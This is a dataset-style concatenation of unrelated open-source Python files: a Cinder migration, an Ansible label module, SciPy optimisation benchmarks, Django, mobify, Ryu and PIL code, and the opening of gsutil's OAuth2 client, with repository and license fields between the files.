# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import Integer
from sqlalchemy import MetaData, Table
def upgrade(migrate_engine):
"""Deleted col of volume_type_projects converted(tinyint->Int)."""
meta = MetaData()
meta.bind = migrate_engine
volume_type_projects = Table('volume_type_projects', meta, autoload=True)
if migrate_engine.name == 'postgresql':
# NOTE: PostgreSQL can't cast Boolean to int automatically
sql = 'ALTER TABLE volume_type_projects ALTER COLUMN deleted ' + \
'TYPE INTEGER USING deleted::integer'
migrate_engine.execute(sql)
else:
volume_type_projects.c.deleted.alter(Integer)
|
apache-2.0
|
ivanhorvath/openshift-tools
|
ansible/roles/lib_oa_openshift/src/ansible/oc_label.py
|
84
|
1037
|
# pylint: skip-file
# flake8: noqa
def main():
''' ansible oc module for labels '''
module = AnsibleModule(
argument_spec=dict(
kubeconfig=dict(default='/etc/origin/master/admin.kubeconfig', type='str'),
state=dict(default='present', type='str',
choices=['present', 'absent', 'list', 'add']),
debug=dict(default=False, type='bool'),
kind=dict(default='node', type='str',
choices=['node', 'pod', 'namespace']),
name=dict(default=None, type='str'),
namespace=dict(default=None, type='str'),
labels=dict(default=None, type='list'),
selector=dict(default=None, type='str'),
),
supports_check_mode=True,
mutually_exclusive=[['name', 'selector']],
)
results = OCLabel.run_ansible(module.params, module.check_mode)
if 'failed' in results:
module.fail_json(**results)
module.exit_json(**results)
if __name__ == '__main__':
main()
|
apache-2.0
|
argriffing/scipy
|
benchmarks/benchmarks/go_benchmark_functions/go_funcs_C.py
|
10
|
18425
|
# -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import numpy as np
from numpy import (abs, asarray, cos, exp, floor, pi, sign, sin, sqrt, sum,
size, tril, isnan, atleast_2d, repeat)
from numpy.testing import assert_almost_equal
from .go_benchmark import Benchmark
class CarromTable(Benchmark):
"""
CarromTable objective function.
The CarromTable [1]_ global optimization problem is a multimodal
minimization problem defined as follows:
.. math::
f_{\text{CarromTable}}(x) = - \frac{1}{30}\left(\cos(x_1)
cos(x_2) e^{\left|1 - \frac{\sqrt{x_1^2 + x_2^2}}{\pi}\right|}\right)^2
with :math:`x_i \in [-10, 10]` for :math:`i = 1, 2`.
*Global optimum*: :math:`f(x) = -24.15681551650653` for :math:`x_i = \pm
9.646157266348881` for :math:`i = 1, 2`
.. [1] Jamil, M. & Yang, X.-S. A Literature Survey of Benchmark Functions
For Global Optimization Problems Int. Journal of Mathematical Modelling
and Numerical Optimisation, 2013, 4, 150-194.
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-10.0] * self.N, [10.0] * self.N)
self.global_optimum = [(9.646157266348881, 9.646134286497169),
(-9.646157266348881, 9.646134286497169),
(9.646157266348881, -9.646134286497169),
(-9.646157266348881, -9.646134286497169)]
self.fglob = -24.15681551650653
def fun(self, x, *args):
self.nfev += 1
u = cos(x[0]) * cos(x[1])
v = sqrt(x[0] ** 2 + x[1] ** 2)
return -((u * exp(abs(1 - v / pi))) ** 2) / 30.
class Chichinadze(Benchmark):
"""
Chichinadze objective function.
This class defines the Chichinadze [1]_ global optimization problem. This is a
multimodal minimization problem defined as follows:
.. math::
f_{\text{Chichinadze}}(x) = x_{1}^{2} - 12 x_{1}
+ 8 \sin\left(\frac{5}{2} \pi x_{1}\right)
+ 10 \cos\left(\frac{1}{2} \pi x_{1}\right) + 11
- 0.2 \frac{\sqrt{5}}{e^{\frac{1}{2} \left(x_{2} -0.5 \right)^{2}}}
with :math:`x_i \in [-30, 30]` for :math:`i = 1, 2`.
*Global optimum*: :math:`f(x) = -42.94438701899098` for :math:`x =
[6.189866586965680, 0.5]`
.. [1] Gavana, A. Global Optimization Benchmarks and AMPGO retrieved 2015
TODO: Jamil#33 has a dividing factor of 2 in the sin term. However, f(x)
for the given solution does not give the global minimum. i.e. the equation
is at odds with the solution.
Only by removing the dividing factor of 2, i.e. `8 * sin(5 * pi * x[0])`
does the given solution result in the given global minimum.
Do we keep the result or equation?
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-30.0] * self.N, [30.0] * self.N)
self.custom_bounds = [(-10, 10), (-10, 10)]
self.global_optimum = [[6.189866586965680, 0.5]]
self.fglob = -42.94438701899098
def fun(self, x, *args):
self.nfev += 1
return (x[0] ** 2 - 12 * x[0] + 11 + 10 * cos(pi * x[0] / 2)
+ 8 * sin(5 * pi * x[0] / 2)
- 1.0 / sqrt(5) * exp(-((x[1] - 0.5) ** 2) / 2))
class Cigar(Benchmark):
"""
Cigar objective function.
This class defines the Cigar [1]_ global optimization problem. This
is a multimodal minimization problem defined as follows:
.. math::
f_{\text{Cigar}}(x) = x_1^2 + 10^6\sum_{i=2}^{n} x_i^2
Here, :math:`n` represents the number of dimensions and :math:`x_i \in
[-100, 100]` for :math:`i = 1, ..., n`.
*Global optimum*: :math:`f(x) = 0` for :math:`x_i = 0` for
:math:`i = 1, ..., n`
.. [1] Gavana, A. Global Optimization Benchmarks and AMPGO retrieved 2015
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-100.0] * self.N,
[100.0] * self.N)
self.custom_bounds = [(-5, 5), (-5, 5)]
self.global_optimum = [[0 for _ in range(self.N)]]
self.fglob = 0.0
self.change_dimensionality = True
def fun(self, x, *args):
self.nfev += 1
return x[0] ** 2 + 1e6 * sum(x[1:] ** 2)
class Cola(Benchmark):
"""
Cola objective function.
This class defines the Cola global optimization problem. The 17-dimensional
function computes indirectly the formula :math:`f(n, u)` by setting
:math:`x_0 = y_0, x_1 = u_0, x_i = u_{2(i-2)}, y_i = u_{2(i-2)+1}` :
.. math::
f_{\text{Cola}}(x) = \sum_{i<j}^{n} \left (r_{i,j} - d_{i,j} \right )^2
Where :math:`r_{i, j}` is given by:
.. math::
r_{i, j} = \sqrt{(x_i - x_j)^2 + (y_i - y_j)^2}
And :math:`d` is a symmetric matrix given by:
.. math::
\{d\} = \left [ d_{ij} \right ] = \begin{pmatrix}
1.27 & & & & & & & & \\
1.69 & 1.43 & & & & & & & \\
2.04 & 2.35 & 2.43 & & & & & & \\
3.09 & 3.18 & 3.26 & 2.85 & & & & & \\
3.20 & 3.22 & 3.27 & 2.88 & 1.55 & & & & \\
2.86 & 2.56 & 2.58 & 2.59 & 3.12 & 3.06 & & & \\
3.17 & 3.18 & 3.18 & 3.12 & 1.31 & 1.64 & 3.00 & \\
3.21 & 3.18 & 3.18 & 3.17 & 1.70 & 1.36 & 2.95 & 1.32 & \\
2.38 & 2.31 & 2.42 & 1.94 & 2.85 & 2.81 & 2.56 & 2.91 & 2.97
\end{pmatrix}
This function has bounds :math:`x_0 \in [0, 4]` and :math:`x_i \in [-4, 4]`
for :math:`i = 1, ..., n-1`.
*Global optimum* 11.7464.
.. [1] Jamil, M. & Yang, X.-S. A Literature Survey of Benchmark Functions
For Global Optimization Problems Int. Journal of Mathematical Modelling
and Numerical Optimisation, 2013, 4, 150-194.
"""
def __init__(self, dimensions=17):
Benchmark.__init__(self, dimensions)
self._bounds = [[0.0, 4.0]] + list(zip([-4.0] * (self.N - 1),
[4.0] * (self.N - 1)))
self.global_optimum = [[0.651906, 1.30194, 0.099242, -0.883791,
-0.8796, 0.204651, -3.28414, 0.851188,
-3.46245, 2.53245, -0.895246, 1.40992,
-3.07367, 1.96257, -2.97872, -0.807849,
-1.68978]]
self.fglob = 11.7464
self.d = asarray([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1.27, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1.69, 1.43, 0, 0, 0, 0, 0, 0, 0, 0],
[2.04, 2.35, 2.43, 0, 0, 0, 0, 0, 0, 0],
[3.09, 3.18, 3.26, 2.85, 0, 0, 0, 0, 0, 0],
[3.20, 3.22, 3.27, 2.88, 1.55, 0, 0, 0, 0, 0],
[2.86, 2.56, 2.58, 2.59, 3.12, 3.06, 0, 0, 0, 0],
[3.17, 3.18, 3.18, 3.12, 1.31, 1.64, 3.00, 0, 0, 0],
[3.21, 3.18, 3.18, 3.17, 1.70, 1.36, 2.95, 1.32, 0, 0],
[2.38, 2.31, 2.42, 1.94, 2.85, 2.81, 2.56, 2.91, 2.97, 0.]])
def fun(self, x, *args):
self.nfev += 1
xi = atleast_2d(asarray([0.0, x[0]] + list(x[1::2])))
xj = repeat(xi, size(xi, 1), axis=0)
xi = xi.T
yi = atleast_2d(asarray([0.0, 0.0] + list(x[2::2])))
yj = repeat(yi, size(yi, 1), axis=0)
yi = yi.T
inner = (sqrt(((xi - xj) ** 2 + (yi - yj) ** 2)) - self.d) ** 2
inner = tril(inner, -1)
return sum(sum(inner, axis=1))
class Colville(Benchmark):
"""
Colville objective function.
This class defines the Colville global optimization problem. This
is a multimodal minimization problem defined as follows:
.. math::
f_{\text{Colville}}(x) = \left(x_{1} -1\right)^{2}
+ 100 \left(x_{1}^{2} - x_{2}\right)^{2}
+ 10.1 \left(x_{2} -1\right)^{2} + \left(x_{3} -1\right)^{2}
+ 90 \left(x_{3}^{2} - x_{4}\right)^{2}
+ 10.1 \left(x_{4} -1\right)^{2} + 19.8 \frac{x_{4} -1}{x_{2}}
with :math:`x_i \in [-10, 10]` for :math:`i = 1, ..., 4`.
*Global optimum*: :math:`f(x) = 0` for :math:`x_i = 1` for
:math:`i = 1, ..., 4`
.. [1] Jamil, M. & Yang, X.-S. A Literature Survey of Benchmark Functions
For Global Optimization Problems Int. Journal of Mathematical Modelling
and Numerical Optimisation, 2013, 4, 150-194.
TODO docstring equation is wrong use Jamil#36
"""
def __init__(self, dimensions=4):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-10.0] * self.N, [10.0] * self.N)
self.global_optimum = [[1 for _ in range(self.N)]]
self.fglob = 0.0
def fun(self, x, *args):
self.nfev += 1
return (100 * (x[0] - x[1] ** 2) ** 2
+ (1 - x[0]) ** 2 + (1 - x[2]) ** 2
+ 90 * (x[3] - x[2] ** 2) ** 2
+ 10.1 * ((x[1] - 1) ** 2 + (x[3] - 1) ** 2)
+ 19.8 * (x[1] - 1) * (x[3] - 1))
class Corana(Benchmark):
"""
Corana objective function.
This class defines the Corana [1]_ global optimization problem. This
is a multimodal minimization problem defined as follows:
.. math::
f_{\text{Corana}}(x) = \begin{cases} \sum_{i=1}^n 0.15 d_i
[z_i - 0.05\textrm{sgn}(z_i)]^2 & \textrm{if }|x_i-z_i| < 0.05 \\
d_ix_i^2 & \textrm{otherwise}\end{cases}
Where, in this exercise:
.. math::
z_i = 0.2 \lfloor |x_i/s_i|+0.49999\rfloor\textrm{sgn}(x_i),
d_i=(1,1000,10,100, ...)
with :math:`x_i \in [-5, 5]` for :math:`i = 1, ..., 4`.
*Global optimum*: :math:`f(x) = 0` for :math:`x_i = 0` for
:math:`i = 1, ..., 4`
.. [1] Gavana, A. Global Optimization Benchmarks and AMPGO retrieved 2015
"""
def __init__(self, dimensions=4):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-5.0] * self.N, [5.0] * self.N)
self.global_optimum = [[0 for _ in range(self.N)]]
self.fglob = 0.0
def fun(self, x, *args):
self.nfev += 1
d = [1., 1000., 10., 100.]
r = 0
for j in range(4):
zj = floor(abs(x[j] / 0.2) + 0.49999) * sign(x[j]) * 0.2
if abs(x[j] - zj) < 0.05:
r += 0.15 * ((zj - 0.05 * sign(zj)) ** 2) * d[j]
else:
r += d[j] * x[j] * x[j]
return r
class CosineMixture(Benchmark):
"""
Cosine Mixture objective function.
This class defines the Cosine Mixture global optimization problem. This
is a multimodal minimization problem defined as follows:
.. math::
f_{\text{CosineMixture}}(x) = -0.1 \sum_{i=1}^n \cos(5 \pi x_i)
- \sum_{i=1}^n x_i^2
Here, :math:`n` represents the number of dimensions and :math:`x_i \in
[-1, 1]` for :math:`i = 1, ..., N`.
*Global optimum*: :math:`f(x) = -0.1N` for :math:`x_i = 0` for
:math:`i = 1, ..., N`
.. [1] Jamil, M. & Yang, X.-S. A Literature Survey of Benchmark Functions
For Global Optimization Problems Int. Journal of Mathematical Modelling
and Numerical Optimisation, 2013, 4, 150-194.
TODO, Jamil #38 has wrong minimum and wrong fglob. I plotted it.
-(x**2) term is always negative if x is negative.
cos(5 * pi * x) is equal to -1 for x=-1.
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self.change_dimensionality = True
self._bounds = zip([-1.0] * self.N, [1.0] * self.N)
self.global_optimum = [[-1. for _ in range(self.N)]]
self.fglob = -0.9 * self.N
def fun(self, x, *args):
self.nfev += 1
return -0.1 * sum(cos(5.0 * pi * x)) - sum(x ** 2.0)
class CrossInTray(Benchmark):
"""
Cross-in-Tray objective function.
This class defines the Cross-in-Tray [1]_ global optimization problem. This is a
multimodal minimization problem defined as follows:
.. math::
f_{\text{CrossInTray}}(x) = - 0.0001 \left(\left|{e^{\left|{100
- \frac{\sqrt{x_{1}^{2} + x_{2}^{2}}}{\pi}}\right|}
\sin\left(x_{1}\right) \sin\left(x_{2}\right)}\right| + 1\right)^{0.1}
with :math:`x_i \in [-15, 15]` for :math:`i = 1, 2`.
*Global optimum*: :math:`f(x) = -2.062611870822739` for :math:`x_i =
\pm 1.349406608602084` for :math:`i = 1, 2`
.. [1] Jamil, M. & Yang, X.-S. A Literature Survey of Benchmark Functions
For Global Optimization Problems Int. Journal of Mathematical Modelling
and Numerical Optimisation, 2013, 4, 150-194.
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-10.0] * self.N, [10.0] * self.N)
self.global_optimum = [(1.349406685353340, 1.349406608602084),
(-1.349406685353340, 1.349406608602084),
(1.349406685353340, -1.349406608602084),
(-1.349406685353340, -1.349406608602084)]
self.fglob = -2.062611870822739
def fun(self, x, *args):
self.nfev += 1
return (-0.0001 * (abs(sin(x[0]) * sin(x[1])
* exp(abs(100 - sqrt(x[0] ** 2 + x[1] ** 2) / pi)))
+ 1) ** (0.1))
class CrossLegTable(Benchmark):
"""
Cross-Leg-Table objective function.
This class defines the Cross-Leg-Table [1]_ global optimization problem. This
is a multimodal minimization problem defined as follows:
.. math::
f_{\text{CrossLegTable}}(x) = - \frac{1}{\left(\left|{e^{\left|{100
- \frac{\sqrt{x_{1}^{2} + x_{2}^{2}}}{\pi}}\right|}
\sin\left(x_{1}\right) \sin\left(x_{2}\right)}\right| + 1\right)^{0.1}}
with :math:`x_i \in [-10, 10]` for :math:`i = 1, 2`.
*Global optimum*: :math:`f(x) = -1`. The global minimum is found on the
planes :math:`x_1 = 0` and :math:`x_2 = 0`
.. [1] Mishra, S. Global Optimization by Differential Evolution and Particle
Swarm Methods: Evaluation on Some Benchmark Functions Munich University,
2006
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-10.0] * self.N, [10.0] * self.N)
self.global_optimum = [[0., 0.]]
self.fglob = -1.0
def fun(self, x, *args):
self.nfev += 1
u = 100 - sqrt(x[0] ** 2 + x[1] ** 2) / pi
v = sin(x[0]) * sin(x[1])
return -(abs(v * exp(abs(u))) + 1) ** (-0.1)
class CrownedCross(Benchmark):
"""
Crowned Cross objective function.
This class defines the Crowned Cross [1]_ global optimization problem. This
is a multimodal minimization problem defined as follows:
.. math::
f_{\text{CrownedCross}}(x) = 0.0001 \left(\left|{e^{\left|{100
- \frac{\sqrt{x_{1}^{2} + x_{2}^{2}}}{\pi}}\right|}
\sin\left(x_{1}\right) \sin\left(x_{2}\right)}\right| + 1\right)^{0.1}
with :math:`x_i \in [-10, 10]` for :math:`i = 1, 2`.
*Global optimum*: :math:`f(x_i) = 0.0001`. The global minimum is found on
the planes :math:`x_1 = 0` and :math:`x_2 = 0`
.. [1] Mishra, S. Global Optimization by Differential Evolution and Particle
Swarm Methods: Evaluation on Some Benchmark Functions Munich University,
2006
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-10.0] * self.N, [10.0] * self.N)
self.global_optimum = [[0, 0]]
self.fglob = 0.0001
def fun(self, x, *args):
self.nfev += 1
u = 100 - sqrt(x[0] ** 2 + x[1] ** 2) / pi
v = sin(x[0]) * sin(x[1])
return 0.0001 * (abs(v * exp(abs(u))) + 1) ** (0.1)
class Csendes(Benchmark):
"""
Csendes objective function.
This class defines the Csendes [1]_ global optimization problem. This is a
multimodal minimization problem defined as follows:
.. math::
f_{\text{Csendes}}(x) = \sum_{i=1}^n x_i^6 \left[ 2 + \sin
\left( \frac{1}{x_i} \right ) \right]
Here, :math:`n` represents the number of dimensions and :math:`x_i \in
[-1, 1]` for :math:`i = 1, ..., N`.
*Global optimum*: :math:`f(x) = 0.0` for :math:`x_i = 0` for
:math:`i = 1, ..., N`
.. [1] Jamil, M. & Yang, X.-S. A Literature Survey of Benchmark Functions
For Global Optimization Problems Int. Journal of Mathematical Modelling
and Numerical Optimisation, 2013, 4, 150-194.
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self.change_dimensionality = True
self._bounds = zip([-1.0] * self.N, [1.0] * self.N)
self.global_optimum = [[0 for _ in range(self.N)]]
self.fglob = np.nan
def fun(self, x, *args):
self.nfev += 1
try:
return sum((x ** 6.0) * (2.0 + sin(1.0 / x)))
except ZeroDivisionError:
return np.nan
except FloatingPointError:
return np.nan
def success(self, x):
"""Is a candidate solution at the global minimum"""
val = self.fun(asarray(x))
if isnan(val):
return True
try:
assert_almost_equal(val, 0., 4)
return True
except AssertionError:
return False
return False
class Cube(Benchmark):
"""
Cube objective function.
This class defines the Cube global optimization problem. This
is a multimodal minimization problem defined as follows:
.. math::
f_{\text{Cube}}(x) = 100(x_2 - x_1^3)^2 + (1 - x_1)^2
Here, :math:`n` represents the number of dimensions and :math:`x_i \in [-10, 10]` for :math:`i=1,...,N`.
*Global optimum*: :math:`f(x_i) = 0.0` for :math:`x = [1, 1]`
.. [1] Jamil, M. & Yang, X.-S. A Literature Survey of Benchmark Functions
For Global Optimization Problems Int. Journal of Mathematical Modelling
and Numerical Optimisation, 2013, 4, 150-194.
TODO: jamil#41 has the wrong solution.
"""
def __init__(self, dimensions=2):
Benchmark.__init__(self, dimensions)
self._bounds = zip([-10.0] * self.N, [10.0] * self.N)
self.custom_bounds = ([0, 2], [0, 2])
self.global_optimum = [[1.0, 1.0]]
self.fglob = 0.0
def fun(self, x, *args):
self.nfev += 1
return 100.0 * (x[1] - x[0] ** 3.0) ** 2.0 + (1.0 - x[0]) ** 2.0
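# Added sketch (not part of the upstream benchmark module): a hypothetical
# check that a benchmark evaluates to (approximately) its documented global
# optimum, using CarromTable as an example.
#
#   b = CarromTable()
#   x0 = asarray(b.global_optimum[0])
#   assert abs(b.fun(x0) - b.fglob) < 1e-6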
|
bsd-3-clause
|
zakuro9715/lettuce
|
tests/integration/lib/Django-1.3/tests/modeltests/str/models.py
|
92
|
1213
|
# -*- coding: utf-8 -*-
"""
2. Adding __str__() or __unicode__() to models
Although it's not a strict requirement, each model should have a
``__str__()`` or ``__unicode__()`` method to return a "human-readable"
representation of the object. Do this not only for your own sanity when dealing
with the interactive prompt, but also because objects' representations are used
throughout Django's automatically-generated admin.
Normally, you should write a ``__unicode__()`` method, since this will work for
all field types (and Django will automatically provide an appropriate
``__str__()`` method). However, you can write a ``__str__()`` method directly,
if you prefer. You must be careful to encode the results correctly, though.
"""
from django.db import models
class Article(models.Model):
headline = models.CharField(max_length=100)
pub_date = models.DateTimeField()
def __str__(self):
# Caution: this is only safe if you are certain that headline will be
# in ASCII.
return self.headline
class InternationalArticle(models.Model):
headline = models.CharField(max_length=100)
pub_date = models.DateTimeField()
def __unicode__(self):
return self.headline
|
gpl-3.0
|
macbre/mobify
|
mobify/sources/readthedocs.py
|
1
|
2431
|
"""
Read The Docs materials
https://lasagne.readthedocs.io/en/latest/
"""
import re
from collections import OrderedDict
from mobify.source import MultiChapterSource, MobifySource
def unique(_list):
_dict = OrderedDict()
for item in _list:
_dict[item] = True
return list(_dict.keys())
class ReadTheDocsBookSource(MultiChapterSource):
@staticmethod
def is_my_url(url):
return '.readthedocs.io/' in url
@staticmethod
def get_canonical_url(url):
"""
Convert https://lasagne.readthedocs.io/en/latest/ to https://lasagne.readthedocs.io/
:type url str
:rtype str
"""
matches = re.search(r'//([^.]+).readthedocs.io/', url)
if matches:
return 'https://{}.readthedocs.io/en/latest'.format(matches.group(1))
else:
return url.rstrip('/')
def get_chapters(self):
links = self.tree.xpath('//*[@aria-label="main navigation"]//a')
url = self.get_canonical_url(self._url) + '/'
chapters = [url] + [url + link.attrib.get('href').lstrip('/.').split('#')[0] for link in links]
chapters = unique(chapters)
self._logger.info('Chapters: {}'.format(chapters))
return [ReadTheDocsBookChapter(url=chapter) for chapter in chapters]
class ReadTheDocsBookChapter(MobifySource):
@staticmethod
def is_my_url(url):
"""
This source cannot be created directly from Publisher
"""
raise NotImplementedError
def get_html(self):
content = self.xpath('//*[@class="section"]')
html = self.get_node_html(content)
# remove headers anchor links
html = re.sub(r'<a class="headerlink"[^<]+</a>', '', html, flags=re.MULTILINE)
# cleanup the code snippets
# <span class="p">(</span>
html = re.sub(r'<span class="\w\w?">([^<]+)</span>', r'\1', html, flags=re.MULTILINE)
html = html.replace('<span></span>', '')
# html = re.sub(r'</?(span|a|img|em|div)[^>]*>', '', html)
# print(html) # import sys; sys.exit()
return html.strip()
def get_title(self):
return self.get_node('//h1//text()') or self.get_node('//li/a[contains(@class, "current")]/text()')
def get_author(self):
return self.get_node('//link[@rel="top"]', attr='title') # Lasagne 0.2.dev1 documentation
def get_language(self):
return 'en'
|
mit
|
osrg/ryu
|
ryu/lib/packet/packet.py
|
4
|
6138
|
# Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import struct
import base64
import six
from . import packet_base
from . import ethernet
from ryu import utils
from ryu.lib.stringify import StringifyMixin
# Packet class dictionary
mod = inspect.getmembers(utils.import_module("ryu.lib.packet"),
lambda cls: (inspect.ismodule(cls)))
cls_list = []
for _, m in mod:
cl = inspect.getmembers(m,
lambda cls: (
inspect.isclass(cls) and
issubclass(cls, packet_base.PacketBase)))
cls_list.extend(list(cl))
PKT_CLS_DICT = dict(cls_list)
class Packet(StringifyMixin):
"""A packet decoder/encoder class.
An instance is used to either decode or encode a single packet.
*data* is a bytearray to describe a raw datagram to decode.
When decoding, a Packet object is iterable.
Iterated values are protocol (ethernet, ipv4, ...) headers and the payload.
Protocol headers are instances of subclass of packet_base.PacketBase.
The payload is a bytearray. They are iterated in on-wire order.
*data* should be omitted when encoding a packet.
"""
# Ignore data field when outputting json representation.
_base_attributes = ['data']
def __init__(self, data=None, protocols=None, parse_cls=ethernet.ethernet):
super(Packet, self).__init__()
self.data = data
if protocols is None:
self.protocols = []
else:
self.protocols = protocols
if self.data:
self._parser(parse_cls)
def _parser(self, cls):
rest_data = self.data
while cls:
# Ignores an empty buffer
if not six.binary_type(rest_data).strip(b'\x00'):
break
try:
proto, cls, rest_data = cls.parser(rest_data)
except struct.error:
break
if proto:
self.protocols.append(proto)
# If rest_data is all padding, we ignore rest_data
if rest_data and six.binary_type(rest_data).strip(b'\x00'):
self.protocols.append(rest_data)
def serialize(self):
"""Encode a packet and store the resulted bytearray in self.data.
This method is legal only when encoding a packet.
"""
self.data = bytearray()
r = self.protocols[::-1]
for i, p in enumerate(r):
if isinstance(p, packet_base.PacketBase):
if i == len(r) - 1:
prev = None
else:
prev = r[i + 1]
data = p.serialize(self.data, prev)
else:
data = six.binary_type(p)
self.data = bytearray(data + self.data)
@classmethod
def from_jsondict(cls, dict_, decode_string=base64.b64decode,
**additional_args):
protocols = []
for proto in dict_['protocols']:
for key, value in proto.items():
if key in PKT_CLS_DICT:
pkt_cls = PKT_CLS_DICT[key]
protocols.append(pkt_cls.from_jsondict(value))
else:
raise ValueError('unknown protocol name %s' % key)
return cls(protocols=protocols)
def add_protocol(self, proto):
"""Register a protocol *proto* for this packet.
This method is legal only when encoding a packet.
When encoding a packet, register a protocol (ethernet, ipv4, ...)
header to add to this packet.
Protocol headers should be registered in on-wire order before calling
self.serialize.
"""
self.protocols.append(proto)
def get_protocols(self, protocol):
"""Returns a list of protocols that matches to the specified protocol.
"""
if isinstance(protocol, packet_base.PacketBase):
protocol = protocol.__class__
assert issubclass(protocol, packet_base.PacketBase)
return [p for p in self.protocols if isinstance(p, protocol)]
def get_protocol(self, protocol):
"""Returns the firstly found protocol that matches to the
specified protocol.
"""
result = self.get_protocols(protocol)
if len(result) > 0:
return result[0]
return None
def __div__(self, trailer):
self.add_protocol(trailer)
return self
def __truediv__(self, trailer):
return self.__div__(trailer)
def __iter__(self):
return iter(self.protocols)
def __getitem__(self, idx):
return self.protocols[idx]
def __setitem__(self, idx, item):
self.protocols[idx] = item
def __delitem__(self, idx):
del self.protocols[idx]
def __len__(self):
return len(self.protocols)
def __contains__(self, protocol):
if (inspect.isclass(protocol) and
issubclass(protocol, packet_base.PacketBase)):
return protocol in [p.__class__ for p in self.protocols]
return protocol in self.protocols
def __str__(self):
return ', '.join(repr(protocol) for protocol in self.protocols)
__repr__ = __str__ # note: str(list) uses __repr__ for elements
# XXX: Hack for preventing recursive import
def _PacketBase__div__(self, trailer):
pkt = Packet()
pkt.add_protocol(self)
pkt.add_protocol(trailer)
return pkt
packet_base.PacketBase.__div__ = _PacketBase__div__
packet_base.PacketBase.__truediv__ = _PacketBase__div__
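# Added sketch (not part of the upstream module): a minimal, hypothetical
# round-trip showing how Packet is typically used for encoding and decoding.
def _example_roundtrip():
    """Build an Ethernet frame, serialize it, then parse it back (sketch only)."""
    pkt = Packet()
    pkt.add_protocol(ethernet.ethernet(dst='ff:ff:ff:ff:ff:ff',
                                       src='00:00:00:00:00:01'))
    pkt.serialize()
    parsed = Packet(pkt.data)
    return parsed.get_protocol(ethernet.ethernet)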
|
apache-2.0
|
zhaochl/python-utils
|
verify_code/Imaging-1.1.7/PIL/GimpPaletteFile.py
|
40
|
1337
|
#
# Python Imaging Library
# $Id$
#
# stuff to read GIMP palette files
#
# History:
# 1997-08-23 fl Created
# 2004-09-07 fl Support GIMP 2.0 palette files.
#
# Copyright (c) Secret Labs AB 1997-2004. All rights reserved.
# Copyright (c) Fredrik Lundh 1997-2004.
#
# See the README file for information on usage and redistribution.
#
import re, string
##
# File handler for GIMP's palette format.
class GimpPaletteFile:
rawmode = "RGB"
def __init__(self, fp):
self.palette = map(lambda i: chr(i)*3, range(256))
if fp.readline()[:12] != "GIMP Palette":
raise SyntaxError, "not a GIMP palette file"
i = 0
while i <= 255:
s = fp.readline()
if not s:
break
# skip fields and comment lines
if re.match("\w+:|#", s):
continue
if len(s) > 100:
raise SyntaxError, "bad palette file"
v = tuple(map(int, string.split(s)[:3]))
if len(v) != 3:
raise ValueError, "bad palette entry"
if 0 <= i <= 255:
self.palette[i] = chr(v[0]) + chr(v[1]) + chr(v[2])
i = i + 1
self.palette = string.join(self.palette, "")
def getpalette(self):
return self.palette, self.rawmode
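# Added usage sketch (not part of the original PIL module): a hypothetical
# caller, assuming "example.gpl" is a GIMP palette file on disk.
#
#   fp = open("example.gpl", "rb")
#   pal = GimpPaletteFile(fp)
#   data, rawmode = pal.getpalette()   # 768-byte "RGB" palette string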
|
apache-2.0
|
yetu/repotools
|
third_party/gsutil/oauth2_plugin/oauth2_client.py
|
45
|
22215
|
# Copyright 2010 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An OAuth2 client library.
This library provides a client implementation of the OAuth2 protocol (see
http://code.google.com/apis/accounts/docs/OAuth2.html).
**** Experimental API ****
This module is experimental and is subject to modification or removal without
notice.
"""
# This implementation is inspired by the implementation in
# http://code.google.com/p/google-api-python-client/source/browse/oauth2client/,
# with the following main differences:
# - This library uses the fancy_urllib monkey patch for urllib to correctly
# implement SSL certificate validation.
# - This library does not assume that client code is using the httplib2 library
# to make HTTP requests.
# - This library implements caching of access tokens independent of refresh
# tokens (in the python API client oauth2client, there is a single class that
# encapsulates both refresh and access tokens).
import cgi
import datetime
import errno
from hashlib import sha1
import logging
import os
import tempfile
import threading
import urllib
import urllib2
import urlparse
from boto import cacerts
from third_party import fancy_urllib
try:
import json
except ImportError:
try:
# Try to import from django, should work on App Engine
from django.utils import simplejson as json
except ImportError:
# Try for simplejson
import simplejson as json
LOG = logging.getLogger('oauth2_client')
# Lock used for checking/exchanging refresh token, so multithreaded
# operation doesn't attempt concurrent refreshes.
token_exchange_lock = threading.Lock()
class Error(Exception):
"""Base exception for the OAuth2 module."""
pass
class AccessTokenRefreshError(Error):
"""Error trying to exchange a refresh token into an access token."""
pass
class AuthorizationCodeExchangeError(Error):
"""Error trying to exchange an authorization code into a refresh token."""
pass
class TokenCache(object):
